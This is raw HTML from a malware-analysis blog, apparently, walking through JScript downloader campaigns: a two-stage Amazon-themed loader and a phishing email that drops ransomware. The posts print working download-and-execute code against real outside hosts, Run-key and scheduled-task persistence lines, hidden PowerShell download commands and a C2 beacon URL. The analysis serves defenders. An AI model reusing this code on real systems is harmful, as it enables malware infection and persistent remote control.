<span style="font-family: open sans, sans-serif;">var HTTP = new ActiveXObject("MSXML2.XMLHTTP");</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">var Stream = new ActiveXObject("ADODB.Stream");</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">var path = wsh.SpecialFolders("Templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">HTTP.Open("GET", "http://forum.glotran.club/rXKAdoWqgi.php", false); HTTP.Send(); if (HTTP.Status == 200) {</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody);</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">Stream.Position = 0; Stream.SaveToFile(path, 2);</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">Stream.Close(); sh.ShellExecute(path, "", "", "open", 1); }</span></div>
<div>
<span style="font-family: open sans, sans-serif;">---------------------------</span></div>
<div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-45125324442207104472017-04-26T15:11:00.001-07:002017-04-26T15:11:26.561-07:00Malware - JS Downloaders: Amazon Delivery Theme | APR 2017<span style="background-color: white; color: #292929; font-family: Lora, serif; font-size: 20px;">This is one of the more interesting JS down-loaders that I've come across recently. The fact that it downloads another script that carries out the final download of the payload is different to what we normally see. As to why exactly it is doing that, not sure. Just an extra layer.</span><br />
<div style="background-color: white; color: #292929; font-family: Lora, serif; font-size: 20px;">
The code in the second download is encrypted by a running XOR and is decrypted on execution. The following shots describe the flow of the campaign.<br /><br />I've included the text versions of the interesting parts from the scripts, with comments, at the end of the post.<br /><br />This is a screenshot of the first stage JS code - that, quite literally, downloads another JS file and then executes it to get the payload.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><a href="http://3.bp.blogspot.com/-Zk4VUqs3bHE/WPf8AOp9p9I/AAAAAAAAMrM/ApUoOHwx1-si7BODO3iwHOveQCnA0gF7gCK4B/s1600/first_stage_JS.png" imageanchor="1" style="background: transparent; clear: left; color: #25a186; cursor: pointer; display: inline-block; margin-bottom: 1em; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="188" src="https://3.bp.blogspot.com/-Zk4VUqs3bHE/WPf8AOp9p9I/AAAAAAAAMrM/ApUoOHwx1-si7BODO3iwHOveQCnA0gF7gCK4B/s640/first_stage_JS.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">First Stage JS</span></td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: justify;">
<span style="text-align: left;">Below is the 'beautified' version of the same code above.</span></div>
<div style="text-align: left;">
<br /></div>
<a href="http://1.bp.blogspot.com/-f5stWeMGy64/WPgFZ1wzadI/AAAAAAAAMrc/2soLDSKiHR869JFHmbBVt5KJhouIU4PiwCK4B/s1600/first_stage_JS_beautified.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="224" src="https://1.bp.blogspot.com/-f5stWeMGy64/WPgFZ1wzadI/AAAAAAAAMrc/2soLDSKiHR869JFHmbBVt5KJhouIU4PiwCK4B/s640/first_stage_JS_beautified.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">First Stage Beautified</span><br /><span style="font-size: x-small;"><br /></span><br /><div style="text-align: left;">
<span style="font-size: x-small;">So below is the output of the selected code that I modified a bit and printed out using the 'console.log' method: </span></div>
</td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><a href="http://1.bp.blogspot.com/-YDDVDHh6Ds8/WPgFeVZ1XFI/AAAAAAAAMrk/lUglGLETCfMCHB-sycZH15qoG9pYOA_pACK4B/s1600/first_stage_debug.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="152" src="https://1.bp.blogspot.com/-YDDVDHh6Ds8/WPgFeVZ1XFI/AAAAAAAAMrk/lUglGLETCfMCHB-sycZH15qoG9pYOA_pACK4B/s640/first_stage_debug.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">First Stage Debugging</span></td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: left;">
Executing the modified code gives us the URLs for the second-stage JS script:</div>
<a href="http://2.bp.blogspot.com/-YnLzfOLpFW0/WPgGXMHPUTI/AAAAAAAAMrw/dL2Dnyz84Lgf31sQiBIgWRRGZISJ1fHIgCK4B/s1600/first_stage_results.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="92" src="https://2.bp.blogspot.com/-YnLzfOLpFW0/WPgGXMHPUTI/AAAAAAAAMrw/dL2Dnyz84Lgf31sQiBIgWRRGZISJ1fHIgCK4B/s640/first_stage_results.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">First Stage execution results</span></td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: left;">
The downloaded JS is saved in the USER directory and runs it:</div>
<a href="http://2.bp.blogspot.com/-Gzlqi7q7JVA/WPgG-xTgC2I/AAAAAAAAMr8/UlTZIVqOCCU9DuoiZyqe2deMUpmmzFqTgCK4B/s1600/second_stage_JS.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="203" src="https://2.bp.blogspot.com/-Gzlqi7q7JVA/WPgG-xTgC2I/AAAAAAAAMr8/UlTZIVqOCCU9DuoiZyqe2deMUpmmzFqTgCK4B/s640/second_stage_JS.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">Second Stage code</span></td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: left;">
Now we go through the actual code that is executed to download the payload. Things get interesting around here. The actual code is encrypted, using a running XOR - decryption happens on execution. Once de-crypted, the code is executed and the payload is downloaded and executed. Again, I've used the console.log method to print out the de-crypted version of the code and other interesting bits following that. </div>
<div style="text-align: left;">
<br /></div>
<a href="http://3.bp.blogspot.com/-EFI6DgLKIz0/WPgIUI_0oGI/AAAAAAAAMsI/l6QduucZ9xIx-8Bj2TcRmRkbUAe63sG-gCK4B/s1600/second_stage_debugging.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="264" src="https://3.bp.blogspot.com/-EFI6DgLKIz0/WPgIUI_0oGI/AAAAAAAAMsI/l6QduucZ9xIx-8Bj2TcRmRkbUAe63sG-gCK4B/s640/second_stage_debugging.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">Second stage debugging</span></td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: left;">
Below is a screenshot of the de-crypted code after the execution takes place - this is the code that will check a few things on the host system and execute a couple of loops and then eventually download the payload. </div>
<br /><a href="http://2.bp.blogspot.com/-n2VsIqQjbjE/WPgK-T9mELI/AAAAAAAAMsg/LFueb5Fgr9kQ4STE6uqMbdIqA_BLu98dwCK4B/s1600/second_stage_results.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="264" src="https://2.bp.blogspot.com/-n2VsIqQjbjE/WPgK-T9mELI/AAAAAAAAMsg/LFueb5Fgr9kQ4STE6uqMbdIqA_BLu98dwCK4B/s640/second_stage_results.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">Second Stage Results</span></td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: left;">
Below is the code extracted after de-cryption for the second stage downloader:</div>
<br /><a href="http://4.bp.blogspot.com/-g8IA1vIpi3U/WPgJ8uhfpsI/AAAAAAAAMsU/-vqVXRe6XLIEB9Td4glmiC5SBVIE4ABBQCK4B/s1600/second_stage_result.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="172" src="https://4.bp.blogspot.com/-g8IA1vIpi3U/WPgJ8uhfpsI/AAAAAAAAMsU/-vqVXRe6XLIEB9Td4glmiC5SBVIE4ABBQCK4B/s640/second_stage_result.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">Second Stage CODE</span></td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: left;">
Below is the final JS code that will download the payload from the malNet:<a href="http://1.bp.blogspot.com/-UFYtIN2QvM0/WPgMarIgQFI/AAAAAAAAMss/gPJ_R2xK6HcW3A5K2UFKnnia9BuHe5FvACK4B/s1600/final_JS.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-align: center; text-decoration-line: none;"><img border="0" height="212" src="https://1.bp.blogspot.com/-UFYtIN2QvM0/WPgMarIgQFI/AAAAAAAAMss/gPJ_R2xK6HcW3A5K2UFKnnia9BuHe5FvACK4B/s640/final_JS.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></div>
</td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">Final JS Code</span><br /><span style="font-size: x-small;"><br /></span><br /><div style="text-align: left;">
<span style="font-size: x-small;">Here is the final JS code with interesting bits in comments:</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;">Snippet #1</span></b></div>
<div style="text-align: left;">
<b><span style="font-size: x-small;"><br /></span></b></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var ZGncoNX <span class="Apple-tab-span" style="white-space: pre;"> </span>= new ActiveXObject('WScript.Shell');</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var yiwUiaBBet = 600000;</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">//////CPwSorFGbw9A</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">//////5f2PK8sWYO22cgXwhsZX</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var XvHMKvYV <span class="Apple-tab-span" style="white-space: pre;"> </span>= "http://www.volf.de/term.php";</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var xDUceoXahcbBJx0<span class="Apple-tab-span" style="white-space: pre;"> </span> <span class="Apple-tab-span" style="white-space: pre;"> </span>= ZGncoNX.ExpandEnvironmentStrings('%PROCESSOR_REVISION%');</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var xDUceoXahcbBJx1 = "u1"</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var xDUceoXahcbBJx2 = ZGncoNX.ExpandEnvironmentStrings('%PROCESSOR_REVISION%%PROCESSOR_ARCHITECTURE%%COMPUTERNAME%%USERNAME%');</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">//////wK3LkavxMH</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">//////ffYP3PnSvRGt</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">WScript.Echo('x2 in this code is =' + xDUceoXahcbBJx2);</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">xDUceoXahcbBJx2 += xDUceoXahcbBJx;</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var xDUceoXahcbBJx3 = "";</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">//////UP1WM4uKv</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">//////9SuE9DJo4Ar9knha6L</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">for (var xDUceoXahcbBJx4 = 0; xDUceoXahcbBJx4 < xDUceoXahcbBJx2.length; xDUceoXahcbBJx4++) {</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>xDUceoXahcbBJx3 += xDUceoXahcbBJx2.charCodeAt(xDUceoXahcbBJx4).toString(16);</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">};</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">/* ---------------------------</span></div>
<div style="text-align: left;">
<span style="background-color: yellow;"><span style="font-size: x-small;"> xDUceoXahcbBJx3 - this is the ID that is sent back to the C2:</span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">3436303178383657494e2d5036335533454d4835514356697368616c205468616b7572</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"> */</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;">Snippet #2</span></b></div>
<div style="text-align: left;">
<b><span style="font-size: x-small;"><br /></span></b></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><span style="background-color: yellow;">ZGncoNX.Run</span>('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + xDUceoXahcbBJx0 + '0" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile(\'' + XvHMKvYV + '?cmd=d\',\'%userprofile%\\' + xDUceoXahcbBJx0 + '.js\'); %userprofile%\\' + xDUceoXahcbBJx0 + '.js"', 0, false);</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">/* ---------------------------</span></div>
<div style="text-align: left;">
<span style="background-color: yellow;"><span style="font-size: x-small;">ZGncoNX.Run - OUTPUT:</span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46010" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://www.volf.de/term.php?cmd=d','%userprofile%\4601.js'); %userprofile%\<b>4601.js</b>"</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"> */</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;">Snippet #3</span></b></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;"><br /></span></b></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><span style="background-color: yellow;">ZGncoNX.Run</span>('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + xDUceoXahcbBJx0 + '1" /t REG_SZ /F /D "%userprofile%\\' + xDUceoXahcbBJx0 + '.js"', 0, false);</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">/* </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="background-color: yellow;"><span style="font-size: x-small;">ZGncoNX.Run</span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46011" /t REG_SZ /F /D "%userprofile%\4601.js"</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><span style="background-color: #eeeeee;"></span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"> */</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;">Snippet #4</span></b></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><span style="background-color: yellow;">ZGncoNX.Run</span>('SCHTASKS /Create /TN ' + xDUceoXahcbBJx0 + ' /SC DAILY /F /TR %userprofile%\\' + xDUceoXahcbBJx0 + '.js', 0, false);</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">/* ---------------------------</span></div>
<div style="text-align: left;">
<span style="background-color: yellow;"><span style="font-size: x-small;">ZGncoNX.Run</span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">SCHTASKS /Create /TN 4601 /SC DAILY /F /TR %userprofile%\4601.js</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"> */</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;">Snippet #5</span></b></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">This one is the XOR encrypted code:</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">something like this:</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">xDUceoXahcbBJx5.WriteText('var UDyUWGgURHBZ = "\\x3e\\x17\\x41\\x64\\x1d\\x0f\\x7e\\x45\\x6d\\x20\\x22\\x58\\x2b\\x07\\x3f\\x46\\x64\\x45\\x68\\x13\\x12\\x0c\\.......</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;">Snippet #6</span></b></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">xDUceoXahcbBJx6.open('GET', XvHMKvYV + '?cmd=p&id=' + xDUceoXahcbBJx3 + '&group=' + xDUceoXahcbBJx1 + '&os=' + xDUceoXahcbBJx + '&rnd=' + Math.random(), false);</span></div>
<div style="text-align: left;">
<span class="Apple-tab-span" style="white-space: pre;"><span style="font-size: x-small;"> </span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">/* ---------------------------</span></div>
<div style="text-align: left;">
<span style="background-color: yellow;"><span style="font-size: x-small;">EndResult:</span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">http://www.volf.de/term.php?cmd=p&id=3436303178383657494e2d5036335533454d4835514356697368616c205468616b7572&group=u1&os=&rnd=0.06770346768653279</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"> */</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">That's all. </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">:)</span></div>
</td></tr>
</tbody></table>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-433412557690299993.post-17530345268204904922016-06-28T04:14:00.002-07:002016-06-28T04:19:22.583-07:00UpdatedThis one is dishing out crypt0 through a JS attachment in the phish.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="body undoreset" id="yui_3_16_0_ym19_1_1467107463214_5420" style="-webkit-padding-start: 0px; box-sizing: border-box; display: table; outline: none 0px; padding-left: 0px; padding-top: 12px; width: 836px;" tabindex="0">
<div class="email-wrapped" id="yui_3_16_0_ym19_1_1467107463214_5419" style="-webkit-padding-start: 0px; display: table-cell; width: auto; word-break: break-word; word-wrap: break-word;">
Dear victim,<br />
<br style="-webkit-padding-start: 0px;" />
Attached please find the documents you requested..<br />
<br style="-webkit-padding-start: 0px;" />
<br style="-webkit-padding-start: 0px;" />
<br style="-webkit-padding-start: 0px;" />
King regards<br />
Liza Hale<br />
VP Analytic Services<br />
Tue, 28 Jun 2016 08:25:45 +0300</div>
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://4.bp.blogspot.com/-Az4jmyCKHxU/V3JaMSmO4RI/AAAAAAAAAEI/_Hee1mm1pPwn2sBPukqJLsoBRMCDqgnHgCKgB/s1600/Screen%2BShot%2B2016-06-28%2Bat%2B9.04.31%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://4.bp.blogspot.com/-Az4jmyCKHxU/V3JaMSmO4RI/AAAAAAAAAEI/_Hee1mm1pPwn2sBPukqJLsoBRMCDqgnHgCKgB/s320/Screen%2BShot%2B2016-06-28%2Bat%2B9.04.31%2Bpm.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="body undoreset" id="yui_3_16_0_ym19_1_1467107463214_5420" style="-webkit-padding-start: 0px; box-sizing: border-box; display: table; outline: none 0px; padding-left: 0px; padding-top: 12px; width: 836px;" tabindex="0">
<div class="email-wrapped" id="yui_3_16_0_ym19_1_1467107463214_5419" style="-webkit-padding-start: 0px; display: table-cell; width: auto; word-break: break-word; word-wrap: break-word;">
<br />
Here's some info on this one:<br />
<br />
MD5: 24966b6f6301fda044065aaf29a28158 (zip attachment)<br />
MD5: 0e580534f13c21daf6466d433464a014 (the JS file in the attachment)</div>
</div>
<div class="tictac-att-tray-base" id="yui_3_16_0_ym19_1_1467107463214_5405" style="-webkit-padding-start: 0px; margin-top: 30px;">
<div class="yui3-widget yui3-attachment-tray" id="yui_3_16_0_ym19_1_1467107463214_5300" style="-webkit-padding-start: 0px; border: none; clear: both; padding: 0px;">
<div class="yui3-attachment-tray-content" id="yui_3_16_0_ym19_1_1467107463214_5302" style="-webkit-padding-start: 0px;">
<div class="tictac-att white " id="yui_3_16_0_ym19_1_1467107463214_5311" style="-webkit-padding-start: 0px; background: rgb(255, 255, 255); border-top-color: rgb(236, 236, 236); border-top-style: solid; border-top-width: 0px; box-sizing: border-box; margin: 0px; padding: 0px; position: relative; width: 836px;">
<div class="tictac-att-thumb-cover" id="yui_3_16_0_ym19_1_1467107463214_5368" style="-webkit-padding-start: 0px; box-sizing: border-box; margin: 0px; overflow: hidden; padding: 0px; position: relative;">
</div>
</div>
</div>
</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Yr0CsJ9zzYs/V3Jbg_4RGrI/AAAAAAAAAEc/P0xF8_fPw284v9S08Oeyt_F9dsRSkxbfgCKgB/s1600/Screen%2BShot%2B2016-06-28%2Bat%2B9.10.57%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://3.bp.blogspot.com/-Yr0CsJ9zzYs/V3Jbg_4RGrI/AAAAAAAAAEc/P0xF8_fPw284v9S08Oeyt_F9dsRSkxbfgCKgB/s640/Screen%2BShot%2B2016-06-28%2Bat%2B9.10.57%2Bpm.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-BQpfDEdhhLE/V3JbjdfUjOI/AAAAAAAAAEk/MYXj3oUddvcPDhnHU8BKX8VhM5s81RYvACKgB/s1600/Screen%2BShot%2B2016-06-28%2Bat%2B9.10.32%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="80" src="https://1.bp.blogspot.com/-BQpfDEdhhLE/V3JbjdfUjOI/AAAAAAAAAEk/MYXj3oUddvcPDhnHU8BKX8VhM5s81RYvACKgB/s640/Screen%2BShot%2B2016-06-28%2Bat%2B9.10.32%2Bpm.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-8FTtzfh3mlo/V3JbeyamUII/AAAAAAAAAEs/h6pGoN52-J4_mhUVHtdzCX8IVRO0rPM7QCKgB/s1600/Screen%2BShot%2B2016-06-28%2Bat%2B9.11.17%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="394" src="https://4.bp.blogspot.com/-8FTtzfh3mlo/V3JbeyamUII/AAAAAAAAAEs/h6pGoN52-J4_mhUVHtdzCX8IVRO0rPM7QCKgB/s640/Screen%2BShot%2B2016-06-28%2Bat%2B9.11.17%2Bpm.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<a href="https://1.bp.blogspot.com/-BQpfDEdhhLE/V3JbjdfUjOI/AAAAAAAAAEk/MYXj3oUddvcPDhnHU8BKX8VhM5s81RYvACKgB/s1600/Screen%2BShot%2B2016-06-28%2Bat%2B9.10.32%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://1.bp.blogspot.com/-BQpfDEdhhLE/V3JbjdfUjOI/AAAAAAAAAEk/MYXj3oUddvcPDhnHU8BKX8VhM5s81RYvACKgB/s1600/Screen%2BShot%2B2016-06-28%2Bat%2B9.10.32%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://1.bp.blogspot.com/-BQpfDEdhhLE/V3JbjdfUjOI/AAAAAAAAAEk/MYXj3oUddvcPDhnHU8BKX8VhM5s81RYvACKgB/s1600/Screen%2BShot%2B2016-06-28%2Bat%2B9.10.32%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://1.bp.blogspot.com/-BQpfDEdhhLE/V3JbjdfUjOI/AAAAAAAAAEk/MYXj3oUddvcPDhnHU8BKX8VhM5s81RYvACKgB/s1600/Screen%2BShot%2B2016-06-28%2Bat%2B9.10.32%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://1.bp.blogspot.com/-BQpfDEdhhLE/V3JbjdfUjOI/AAAAAAAAAEk/MYXj3oUddvcPDhnHU8BKX8VhM5s81RYvACKgB/s1600/Screen%2BShot%2B2016-06-28%2Bat%2B9.10.32%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br 